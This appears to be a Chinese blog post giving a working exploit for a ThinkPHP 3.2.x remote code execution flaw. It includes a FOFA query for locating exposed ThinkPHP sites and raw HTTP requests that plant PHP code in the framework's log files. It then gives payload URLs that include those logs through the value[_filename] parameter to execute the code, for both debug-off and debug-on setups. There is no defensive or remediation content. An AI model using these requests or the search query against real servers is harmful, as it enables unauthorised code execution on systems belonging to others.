# ThinkPHP3.2.x RCE漏洞
==FOFA==
header="thinkphp"
GET /index.php?m=-->=phpinfo();?> HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; Upgrade-Insecure-Requests: 1
\Application\Runtime\Logs\Common\21_06_30.log
Payload
http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_06_30.log
GET /index.php?m=Home&c=Index&a=index&test=-->=phpinfo();?> HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; Upgrade-Insecure-Requests: 1
\Application\Runtime\Logs\Home\21_06_30.log
Payload
http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_06_30.log
http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./test.txt
==FOFA==
header="thinkphp"
關閉Debug:
GET /index.php?m=-->=phpinfo();?> HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; Upgrade-Insecure-Requests: 1
日誌文件
\Application\Runtime\Logs\Common\21_06_30.log
Payload
http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_06_30.log
PHPINFO執行成功。
開啓Debug:
GET /index.php?m=Home&c=Index&a=index&test=-->=phpinfo();?> HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; Upgrade-Insecure-Requests: 1
日誌文件
\Application\Runtime\Logs\Home\21_06_30.log
Payload
http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_06_30.log
http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./test.txt
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容